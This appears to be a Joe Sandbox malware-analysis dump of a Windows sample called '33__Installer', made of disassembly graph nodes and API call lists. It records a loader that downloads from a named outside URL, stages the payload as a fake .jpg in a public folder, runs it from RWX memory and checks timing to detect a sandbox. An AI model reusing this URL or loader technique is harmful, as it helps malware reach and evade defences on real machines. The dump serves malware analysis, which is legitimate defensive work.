25623 c2bec1 GetConsoleMode 25621->25623 25634 c2c21f 25622->25634 25638 c2c2ec 25622->25638 25623->25616 25627 c2beea 25623->25627 25626 c2c476 25624->25626 25624->25629 25633 c2c449 25624->25633 25625->25624 25626->25629 25632 c2af3f __tolower_l 66 API calls 25626->25632 25627->25616 25628 c2befa GetConsoleCP 25627->25628 25628->25624 25658 c2bf1d 25628->25658 25629->25598 25630 c2c1b4 WriteFile 25630->25625 25637 c2c1e8 25630->25637 25631->25626 25631->25630 25636 c2c499 25632->25636 25640 c2c454 25633->25640 25641 c2c468 25633->25641 25634->25626 25635 c2c28e WriteFile 25634->25635 25635->25625 25644 c2c2c2 25635->25644 25645 c2af52 __read_nolock 66 API calls 25636->25645 25637->25624 25637->25631 25648 c2c20d 25637->25648 25638->25626 25639 c2c35d WideCharToMultiByte 25638->25639 25639->25625 25642 c2c394 WriteFile 25639->25642 25646 c2af3f __tolower_l 66 API calls 25640->25646 25643 c2af65 __dosmaperr 66 API calls 25641->25643 25647 c2c3cb GetLastError 25642->25647 25652 c2c3bf 25642->25652 25643->25629 25644->25624 25644->25634 25644->25648 25645->25629 25649 c2c459 25646->25649 25647->25652 25648->25624 25650 c2af52 __read_nolock 66 API calls 25649->25650 25650->25629 25651 c32a77 __write_nolock 76 API calls 25651->25658 25652->25624 25652->25638 25652->25642 25652->25648 25653 c340b3 WriteConsoleW CreateFileW __write_nolock 25657 c2c021 25653->25657 25654 c2bfc9 WideCharToMultiByte 25654->25624 25656 c2bffa WriteFile 25654->25656 25655 c3420b 78 API calls __fassign 25655->25658 25656->25625 25656->25657 25657->25624 25657->25625 25657->25653 25657->25658 25659 c2c04e WriteFile 25657->25659 25658->25624 25658->25651 25658->25654 25658->25655 25658->25657 25659->25625 25659->25657 25660->25565 25661->25571 25662->25568 25663->25574 25664->25571 25665->25581 25666->25580 25667->25571 25668->25554 25669->25556 25671 c21acf 25670->25671 25672 c21a2a _memmove 25670->25672 25671->25190 25672->25671 25677 c23100 25672->25677 25674->25188 25675->25192 25676->25194 25678 c2312d 25677->25678 25681 c23142 25677->25681 25679 c23191 25678->25679 25678->25681 25683 c231bf 25678->25683 25688 c257d5 25679->25688 25681->25672 25682 c23297 25682->25681 25709 c22490 99 API calls _fputc 25682->25709 25683->25681 25683->25682 25707 c2607a 68 API calls 4 library calls 25683->25707 25708 c22a20 77 API calls std::_Xinvalid_argument 25683->25708 25686 c232a9 25686->25672 25689 c257e1 __alloc_osfhnd 25688->25689 25690 c257f4 25689->25690 25691 c2580c 25689->25691 25731 c2af3f 66 API calls __getptd_noexit 25690->25731 25693 c25af4 __lock_file 67 API calls 25691->25693 25695 c25812 25693->25695 25694 c257f9 25732 c2aeed 11 API calls __strnicmp_l 25694->25732 25697 c2b6c3 __flsbuf 66 API calls 25695->25697 25699 c25887 25695->25699 25703 c25822 25697->25703 25698 c25804 __alloc_osfhnd 25698->25681 25702 c25895 25699->25702 25710 c2b6e9 25699->25710 25735 c258c9 LeaveCriticalSection LeaveCriticalSection _fgetc 25702->25735 25703->25699 25733 c2af3f 66 API calls __getptd_noexit 25703->25733 25705 c2587c 25734 c2aeed 11 API calls __strnicmp_l 25705->25734 25707->25683 25708->25683 25709->25686 25711 c2b6c3 __flsbuf 66 API calls 25710->25711 25712 c2b6f9 25711->25712 25713 c2b704 25712->25713 25714 c2b71b 25712->25714 25739 c2af3f 66 API calls __getptd_noexit 25713->25739 25716 c2b71f 25714->25716 25725 c2b72c __flsbuf 25714->25725 25740 c2af3f 66 API calls __getptd_noexit 25716->25740 25718 c2b78d 25719 c2b81c 25718->25719 25720 c2b79c 25718->25720 25721 c2c4c7 __write 97 API calls 25719->25721 25722 c2b7b3 25720->25722 25727 c2b7d0 25720->25727 25724 c2b709 25721->25724 25723 c2c4c7 __write 97 API calls 25722->25723 25723->25724 25724->25702 25725->25718 25725->25724 25728 c2b782 25725->25728 25741 c32877 25725->25741 25727->25724 25750 c2cae1 71 API calls 7 library calls 25727->25750 25728->25718 25736 c2b84d 25728->25736 25731->25694 25732->25698 25733->25705 25734->25699 25735->25698 25737 c26dc8 __malloc_crt 66 API calls 25736->25737 25738 c2b862 25737->25738 25738->25718 25739->25724 25740->25724 25742 c32893 25741->25742 25743 c32884 25741->25743 25746 c328b1 25742->25746 25752 c2af3f 66 API calls __getptd_noexit 25742->25752 25751 c2af3f 66 API calls __getptd_noexit 25743->25751 25745 c32889 25745->25728 25746->25728 25748 c328a4 25753 c2aeed 11 API calls __strnicmp_l 25748->25753 25750->25724 25751->25745 25752->25748 25753->25745 25755 c22fe1 25754->25755 25756 c22fca 25754->25756 25755->25199 25756->25755 25759 c2607a 68 API calls 4 library calls 25756->25759 25760 c22a20 77 API calls std::_Xinvalid_argument 25756->25760 25759->25756 25760->25756 25761->25124 25762->25126 25763->25128 25767 c2b204 25764->25767 25770 c2b17f 25767->25770 25769 c21248 25769->25133 25769->25135 25771 c2b18b __flsbuf __alloc_osfhnd 25770->25771 25772 c2b1a2 25771->25772 25773 c2b1b7 25771->25773 25785 c2af3f 66 API calls __getptd_noexit 25772->25785 25774 c25af4 __lock_file 67 API calls 25773->25774 25776 c2b1bd 25774->25776 25787 c2a0b4 66 API calls 2 library calls 25776->25787 25777 c2b1a7 25786 c2aeed 11 API calls __strnicmp_l 25777->25786 25780 c2b1c8 25788 c2a150 97 API calls __flush 25780->25788 25782 c2b1b2 __alloc_osfhnd 25782->25769 25783 c2b1e1 25789 c2b1fc LeaveCriticalSection LeaveCriticalSection _fgetc 25783->25789 25785->25777 25786->25782 25787->25780 25788->25783 25789->25782 25790 61714e0 25791 61714e3 25790->25791 25795 61717c7 25791->25795 25800 61718e0 25791->25800 25805 6171941 25791->25805 25797 61717d8 25795->25797 25796 61718de 25796->25791 25797->25796 25810 6171970 25797->25810 25814 617195f 25797->25814 25801 61718b7 25800->25801 25802 61718de 25801->25802 25803 6171970 GlobalMemoryStatusEx 25801->25803 25804 617195f GlobalMemoryStatusEx 25801->25804 25802->25791 25803->25801 25804->25801 25806 61718b7 25805->25806 25807 61718de 25806->25807 25808 6171970 GlobalMemoryStatusEx 25806->25808 25809 617195f GlobalMemoryStatusEx 25806->25809 25807->25791 25808->25806 25809->25806 25811 6171973 25810->25811 25819 6172563 25811->25819 25812 6171a76 25812->25812 25815 617190b 25814->25815 25816 6171966 25814->25816 25815->25797 25818 6172563 GlobalMemoryStatusEx 25816->25818 25817 6171a76 25817->25817 25818->25817 25820 6172398 25819->25820 25821 6172584 25819->25821 25821->25820 25825 61771e8 25821->25825 25829 61771d8 25821->25829 25822 617285a 25822->25812 25826 61771eb 25825->25826 25835 6177477 25826->25835 25827 617726f 25827->25822 25830 61771ab 25829->25830 25832 61771de 25829->25832 25830->25822 25831 6177167 25831->25822 25832->25831 25834 6177477 GlobalMemoryStatusEx 25832->25834 25833 617726f 25833->25822 25834->25833 25836 617748c 25835->25836 25840 61778b3 25836->25840 25845 61778c0 25836->25845 25837 6177496 25837->25827 25842 61778c4 25840->25842 25841 61778cd 25841->25837 25842->25841 25850 61774b0 25842->25850 25846 61778f5 25845->25846 25847 61778cd 25845->25847 25848 61774b0 GlobalMemoryStatusEx 25846->25848 25847->25837 25849 6177912 25848->25849 25849->25837 25851 6177998 GlobalMemoryStatusEx 25850->25851 25853 6177912 25851->25853 25853->25837 25854 3cafb37 25871 3cb1628 GetPEB 25854->25871 25856 3cafb57 25857 3cb1628 GetPEB 25856->25857 25858 3cafb6b 25857->25858 25859 3cafb84 VirtualAlloc 25858->25859 25870 3cafcc8 25858->25870 25860 3cafb9b 25859->25860 25859->25870 25861 3cb1628 GetPEB 25860->25861 25860->25870 25862 3cafc0d 25861->25862 25863 3cafc2b LoadLibraryA 25862->25863 25865 3cafc3b 25862->25865 25862->25870 25863->25863 25863->25865 25864 3cb1628 GetPEB 25864->25865 25865->25864 25866 3cafc77 25865->25866 25865->25870 25866->25870 25873 3caffe7 LoadLibraryA 25866->25873 25872 3cb163c 25871->25872 25872->25856 25874 3cb0004 25873->25874 25875 3cafcb5 25873->25875 25874->25875 25876 3cb002c VirtualProtect 25874->25876 25875->25870 25883 3cb00cd 25875->25883 25876->25875 25877 3cb0040 25876->25877 25878 3cb005a VirtualProtect 25877->25878 25879 3cb0076 25878->25879 25879->25875 25880 3cb008a VirtualProtect 25879->25880 25880->25875 25881 3cb009a 25880->25881 25882 3cb00af VirtualProtect 25881->25882 25882->25875 25885 3cb00de 25883->25885 25884 3cb00e4 25884->25870 25885->25884 25886 3cb0112 VirtualProtect 25885->25886 25886->25884 25887 3cb0126 25886->25887 25888 3cb0140 VirtualProtect 25887->25888 25889 3cb015c 25888->25889 25889->25884 25890 3cb0170 VirtualProtect 25889->25890 25890->25884 25891 3cb0180 25890->25891 25892 3cb0195 VirtualProtect 25891->25892 25892->25884

                  Control-flow Graph

                  APIs
                  • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00C23940
                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00C23961
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239AF
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239E2
                  • InternetCloseHandle.WININET(00000000), ref: 00C23A24
                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C23A44
                  • InternetCloseHandle.WININET(00000000), ref: 00C23A4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Internet$CloseFileHandleOpenRead$Ios_base_dtorstd::ios_base::_
                  • String ID: Download
                  • API String ID: 3765100444-2171396134
                  • Opcode ID: 145a3d9d9e6b4ac4b838fcd88fde54951e804457b8256cbe0fa16caa5e727552
                  • Instruction ID: ae3c369be5da58f882f38a257ec630141c834e60b941d53cfcdb7fbb4ae0af68
                  • Opcode Fuzzy Hash: 145a3d9d9e6b4ac4b838fcd88fde54951e804457b8256cbe0fa16caa5e727552
                  • Instruction Fuzzy Hash: D131A171610369ABEB20DB94DC85FEE737CEB04B10F104168F51AB65D0DBB4AB84CB65
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
                  • API String ID: 0-56095411
                  • Opcode ID: d4c50eeb6d94ab4e5a4c40604068b411ca4a2c2610ae5338b0b77be0aa638678
                  • Instruction ID: 615905b4f04c8c3017dba5536fd1d0075890dbf0de46f1b8b09045fa8b64cc38
                  • Opcode Fuzzy Hash: d4c50eeb6d94ab4e5a4c40604068b411ca4a2c2610ae5338b0b77be0aa638678
                  • Instruction Fuzzy Hash: 5E726174A00219DFDB54DFA9C844AAEBBF6BF88300F158569E805EB3A1DB31DD41CB90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 927 6177cb0-6177cbf 929 6177cc1-6177cc3 927->929 930 6177cc8-6177cd8 927->930 931 61780a1-61780a8 929->931 933 6177cde-6177cec 930->933 934 61780a9-617811e 930->934 933->934 937 6177cf2 933->937 937->934 938 6178056-6178066 937->938 939 6177d55-6177d65 937->939 940 6177e33-6177e43 937->940 941 6177f71-6177f81 937->941 942 6177d9f-6177daf 937->942 943 6177f1f-6177f2f 937->943 944 6177e7d-6177e8d 937->944 945 6177cf9-6177d09 937->945 946 6178019-6178029 937->946 947 6177ec0-6177ed0 937->947 948 617808d-6178099 937->948 949 6177de9-6177df9 937->949 950 6177fc9-6177fcf 937->950 954 6178081-617808b 938->954 955 6178068-617806e 938->955 960 6177d67-6177d6d 939->960 961 6177d8a-6177d9a 939->961 956 6177e45-6177e4b 940->956 957 6177e68-6177e78 940->957 958 6177f83-6177f89 941->958 959 6177fad-6177fc4 941->959 966 6177dd4-6177de4 942->966 967 6177db1-6177db7 942->967 970 6177f53-6177f6c 943->970 971 6177f31-6177f37 943->971 962 6177e8f-6177e95 944->962 963 6177eab-6177ebb 944->963 952 6177d36-6177d50 945->952 953 6177d0b-6177d11 945->953 972 6178044-6178054 946->972 973 617802b-6178031 946->973 968 6177ed2-6177ed8 947->968 969 6177eff-6177f1a 947->969 948->931 974 6177e1e-6177e2e 949->974 975 6177dfb-6177e01 949->975 964 6177fd3 950->964 965 6177fd1 950->965 952->931 988 6177d13-6177d15 953->988 989 6177d1f-6177d31 953->989 954->931 976 6178070-6178072 955->976 977 617807c-617807f 955->977 978 6177e4d-6177e4f 956->978 979 6177e59-6177e63 956->979 957->931 990 6177f97-6177fa8 958->990 991 6177f8b-6177f8d 958->991 959->931 992 6177d6f-6177d71 960->992 993 6177d7b-6177d85 960->993 961->931 980 6177e97-6177e99 962->980 981 6177ea3-6177ea6 962->981 963->931 994 6177fd5-6177fd7 964->994 965->994 966->931 995 6177dc5-6177dcf 967->995 996 6177db9-6177dbb 967->996 983 6177ee6-6177efa 968->983 984 6177eda-6177edc 968->984 969->931 970->931 986 6177f45-6177f4e 971->986 987 6177f39-6177f3b 971->987 972->931 997 6178033-6178035 973->997 998 617803f-6178042 973->998 974->931 999 6177e03-6177e05 975->999 1000 6177e0f-6177e19 975->1000 976->977 977->931 978->979 979->931 980->981 981->931 983->931 984->983 986->931 987->986 988->989 989->931 990->931 991->990 992->993 993->931 1012 6177fd9-6177fe3 994->1012 1013 6177fe8-6178014 994->1013 995->931 996->995 997->998 998->931 999->1000 1000->931 1012->931 1013->931
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: LR^q$Xbq
                  • API String ID: 0-1504435008
                  • Opcode ID: 25c4d84802ddfd141ce49f017dc867ba1d36cb7c4548f75f139edbfb08811e9f
                  • Instruction ID: 41d0c64e60352804ec4a38bcd2f8d6464b9baec4d8fc79da1b3b3cf52d355eb2
                  • Opcode Fuzzy Hash: 25c4d84802ddfd141ce49f017dc867ba1d36cb7c4548f75f139edbfb08811e9f
                  • Instruction Fuzzy Hash: B5C16370E04219CFDF9C5F6688582BDBAB2BFC8711F194D69D846E6288CF348C81CB65
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: Te^q
                  • API String ID: 0-671973202
                  • Opcode ID: 2f7d6c7e4d338100b075dec7673654edeca13cdfc8900df8ed6af35fbc934aba
                  • Instruction ID: ea589dce67764f1e05205111f018da8ccc590656f4d7da342e30b0894176ee70
                  • Opcode Fuzzy Hash: 2f7d6c7e4d338100b075dec7673654edeca13cdfc8900df8ed6af35fbc934aba
                  • Instruction Fuzzy Hash: 18629134B10210CFDB98EB74D855B6E7BB7AF84700F218669E8069B3A4DF35DD468B81
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 46e565390850ac4ff7a8a515e1c3715bcbd7bec5defbe4dd8d8a05bafe4e1d60
                  • Instruction ID: 2fe4608e8d5d5738ee560253025720a958159030740a65ebdb55b69f73ae5f83
                  • Opcode Fuzzy Hash: 46e565390850ac4ff7a8a515e1c3715bcbd7bec5defbe4dd8d8a05bafe4e1d60
                  • Instruction Fuzzy Hash: 4CB14D70E002098FDB54CFA9C9957DEBBF2EF88318F148529D815E7294EB749846CF91
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c2ee22c02aea3992203695b8cfbb82c0a989dc504dfdbee52083a5f348b9837f
                  • Instruction ID: b5eea4a44a7866d0522ba1e0f2f9e66ebe87b94bd59c30284e8e051982709646
                  • Opcode Fuzzy Hash: c2ee22c02aea3992203695b8cfbb82c0a989dc504dfdbee52083a5f348b9837f
                  • Instruction Fuzzy Hash: 91B17E70E0020DCFDB54CFA9D9957ADBBF2AF88354F248529D818E7294EF349885CB81

                  Control-flow Graph

                  APIs
                  • GetTickCount64.KERNEL32 ref: 00C2121F
                  • Sleep.KERNEL32(0000012C), ref: 00C21228
                  • GetTickCount64.KERNEL32 ref: 00C2122E
                    • Part of subcall function 00C24E4E: __vwprintf_l.LIBCMT ref: 00C24E5C
                  • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00C21278
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00C21283
                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00C21295
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C212A7
                  • CloseHandle.KERNEL32(00000000), ref: 00C212AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
                  • String ID: C:\Users\Public\Downloads\ind.jpg$sandbox!!!$v4:%d
                  • API String ID: 1694741105-2668386317
                  • Opcode ID: e460d6ec3224e75e7a4c69b08d48bd6085e2ef808c2631736f9c7e00a9ac5834
                  • Instruction ID: bd8948a2e588f026088db30cb350f1e74a09fd60061ff16accf0695ed7d79e31
                  • Opcode Fuzzy Hash: e460d6ec3224e75e7a4c69b08d48bd6085e2ef808c2631736f9c7e00a9ac5834
                  • Instruction Fuzzy Hash: 8F119637A542147BE62097F96D0EFDE7B68DB8AB31F200521FB05E72D0D9F4590082E5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 385 3caffe7-3cafffc LoadLibraryA 386 3cafffe-3caffff 385->386 387 3cb0004-3cb0015 385->387 388 3cb00c9-3cb00cc 386->388 390 3cb001b-3cb0026 387->390 391 3cb00c5 387->391 390->391 392 3cb002c-3cb003a VirtualProtect 390->392 393 3cb00c7-3cb00c8 391->393 392->391 394 3cb0040-3cb007a call 3cb161e call 3cb18bb VirtualProtect 392->394 393->388 394->391 400 3cb007c-3cb0088 394->400 400->391 401 3cb008a-3cb0098 VirtualProtect 400->401 401->391 402 3cb009a-3cb00c3 call 3cb161e call 3cb18bb VirtualProtect 401->402 402->393
                  APIs
                  • LoadLibraryA.KERNEL32(?,00000000,00000002,?,03CAFCB5,00000000), ref: 03CAFFF5
                  • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03CAFCB5,00000000), ref: 03CB0035
                  • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03CB0068
                  • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03CB0093
                  • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03CB00BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProtectVirtual$LibraryLoad
                  • String ID:
                  • API String ID: 895956442-0
                  • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                  • Instruction ID: 491c4cc15db236f53dcacf44dae9e0268d9878801db9c5877768547230b15511
                  • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                  • Instruction Fuzzy Hash: DD21C2B620130A6FD330DA659C48EBBB7FCEB84301F08083EBA46D2450EB75E6088760

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 407 3cb00cd-3cb00e2 409 3cb00ea-3cb00fb 407->409 410 3cb00e4-3cb00e5 407->410 413 3cb01ab 409->413 414 3cb0101-3cb010c 409->414 411 3cb01af-3cb01b2 410->411 415 3cb01ad-3cb01ae 413->415 414->413 416 3cb0112-3cb0120 VirtualProtect 414->416 415->411 416->413 417 3cb0126-3cb0160 call 3cb161e call 3cb18bb VirtualProtect 416->417 417->413 423 3cb0162-3cb016e 417->423 423->413 424 3cb0170-3cb017e VirtualProtect 423->424 424->413 425 3cb0180-3cb01a9 call 3cb161e call 3cb18bb VirtualProtect 424->425 425->415
                  APIs
                  • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03CB011B
                  • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03CB014E
                  • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03CB0179
                  • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03CB01A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                  • Instruction ID: 965d72bfd31e57ed24702ce626153186c9cc59e224517eb2fd668f30b0f30ee6
                  • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                  • Instruction Fuzzy Hash: 2B21B3B32007596FE324DA61CC88EBBB7FCEB88200F08483DBA97D5551EB76E5058620

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C211E0: __time64.LIBCMT ref: 00C211E3
                    • Part of subcall function 00C211E0: _rand.LIBCMT ref: 00C211F6
                    • Part of subcall function 00C211E0: _rand.LIBCMT ref: 00C211FB
                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00C23A84
                    • Part of subcall function 00C23910: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00C23940
                    • Part of subcall function 00C23910: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00C23961
                    • Part of subcall function 00C23910: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239AF
                    • Part of subcall function 00C23910: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239E2
                    • Part of subcall function 00C23910: InternetCloseHandle.WININET(00000000), ref: 00C23A24
                    • Part of subcall function 00C23910: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C23A44
                    • Part of subcall function 00C23910: InternetCloseHandle.WININET(00000000), ref: 00C23A4D
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C23AA6
                    • Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21756
                    • Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21776
                    • Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21796
                    • Part of subcall function 00C21210: GetTickCount64.KERNEL32 ref: 00C2121F
                    • Part of subcall function 00C21210: Sleep.KERNEL32(0000012C), ref: 00C21228
                    • Part of subcall function 00C21210: GetTickCount64.KERNEL32 ref: 00C2122E
                    • Part of subcall function 00C21210: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00C21278
                    • Part of subcall function 00C21210: GetFileSize.KERNEL32(00000000,00000000), ref: 00C21283
                    • Part of subcall function 00C21210: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00C21295
                    • Part of subcall function 00C21210: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C212A7
                    • Part of subcall function 00C21210: CloseHandle.KERNEL32(00000000), ref: 00C212AE
                  Strings
                  • C:\Users\Public\Downloads\ind.jpg, xrefs: 00C23A8A
                  • http://guanlix.cn:881/330.ccp, xrefs: 00C23A8F
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Internet$File$CloseHandleReadVirtual_wprintf$AllocCount64OpenTick_rand$CreateFreeIos_base_dtorSizeSleep__time64std::ios_base::_
                  • String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/330.ccp
                  • API String ID: 1205071456-2177026270
                  • Opcode ID: ffe0df1c19b644c0e43cf0ee955abd4b2ae51fbf52652e5e410c5ecb20803432
                  • Instruction ID: 926d83fd0faa32d8d77e95790ea6ee014f83db9dfd717cc72a0155128d34031f
                  • Opcode Fuzzy Hash: ffe0df1c19b644c0e43cf0ee955abd4b2ae51fbf52652e5e410c5ecb20803432
                  • Instruction Fuzzy Hash: 41D017327D076062E6A173B03C0BFCD21109B28B92F140821FB41B99E699F4264162A9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 515 c24638-c2463e 517 c245b1-c245b4 515->517 518 c245af 515->518 519 c245b6 517->519 520 c245b9-c245bf 517->520 518->517 519->520 521 c245c1-c245c3 520->521 522 c245d1-c245d9 521->522 523 c245c5-c245cf 521->523 524 c245db-c245dd 522->524 525 c245df-c245e1 522->525 523->521 523->522 526 c24634-c24637 524->526 527 c245e3-c245e6 525->527 528 c24605-c2460c call c24571 525->528 527->528 530 c245e8-c245fa call c24571 527->530 531 c24611-c24618 528->531 530->528 535 c245fc 530->535 531->524 533 c2461a-c2461c 531->533 536 c24632 533->536 537 c2461e-c2462d call c27fd3 533->537 538 c245fd-c24603 call c26312 535->538 536->526 537->536 543 c2462f-c24630 537->543 538->524 543->538
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Xfsopenstd::_$_fseek
                  • String ID:
                  • API String ID: 1675860589-0
                  • Opcode ID: 06992a05de329eba3393e4587ee13203ca19278784d78dffb29bb7b723e32fc1
                  • Instruction ID: 378e1085a0dac1553a010e1f79d0e673212680889934f5cf0529aed0ab2e14e9
                  • Opcode Fuzzy Hash: 06992a05de329eba3393e4587ee13203ca19278784d78dffb29bb7b723e32fc1
                  • Instruction Fuzzy Hash: 12118C32A04735A7DB2E4659BC02B7736C5AF01791F184030FEA6C5D91FE20CE118284

                  Control-flow Graph

                  • Executed
                  • Not Executed
